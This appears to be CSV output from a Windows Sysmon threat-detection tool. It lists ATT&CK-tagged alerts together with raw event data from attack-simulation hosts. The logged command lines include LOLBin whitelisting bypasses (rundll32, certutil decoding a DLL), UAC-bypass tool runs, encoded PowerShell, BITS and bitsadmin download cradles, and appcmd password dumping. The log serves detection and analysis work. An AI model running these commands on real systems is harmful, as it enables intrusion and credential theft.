SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + 
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® 
Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj 
",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + 
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16040 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:28:22.488 + 365ABB72-0636-5CD7-0000-0010A6C72100 + 544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\windows\System32\cmd.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-F9CD-5CD6-0000-00201B370100 + 0x1371b + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0545-5CD7-0000-001078371F00 + 3044 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". 
)" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5988 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.375 + 365ABB72-3D70-5CEB-0000-001032EAFF00 + 1004 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4893 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.238 + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt 
-Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4893 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.238 + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational 
+[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5985 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.265 + 365ABB72-3D70-5CEB-0000-001072E6FF00 + 2640 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4892 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.184 + 747F3D96-660F-5D3F-0000-00109B328600 + 6020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command 
Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966184 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 17:41:08.947 + 365ABB72-29B4-5C91-0000-0010289AC308 + 3748 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.EXE /c malwr.vbs + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-2209-5C91-0000-0020FA479E03 + 0x39e47fa + 2 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-1A4A-5C91-0000-0010455A0000 + 512 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 
windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:08:00.336 + 365ABB72-8B80-5CD3-0000-001065512A00 + 2264 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c notepad.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-8B77-5CD3-0000-0010E8FD2900 + 3836 + 
C:\Windows\System32\sdclt.exe + ? + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + 
rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5982 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.164 + 365ABB72-3D70-5CEB-0000-0010B2E2FF00 + 2108 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running 
image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 15:08:07.355 + 747F3D96-A357-5D45-0000-0010BD149A01 + 5396 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A356-5D45-0000-001014F99901 + 4056 + C:\Windows\System32\mmc.exe + "C:\Windows\System32\mmc.exe" eventvwr.msc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 143189 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-12 15:06:49.415 + 747F3D96-BB89-5EBA-0000-001019683600 + 4688 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B086-5EBA-0000-0020BF9E0800 + 0x89ebf + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-BB89-5EBA-0000-001042653600 + 1088 + 
C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe + C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16150 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 18:10:42.653 + 365ABB72-1022-5CD7-0000-0010DF121C00 + 3248 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 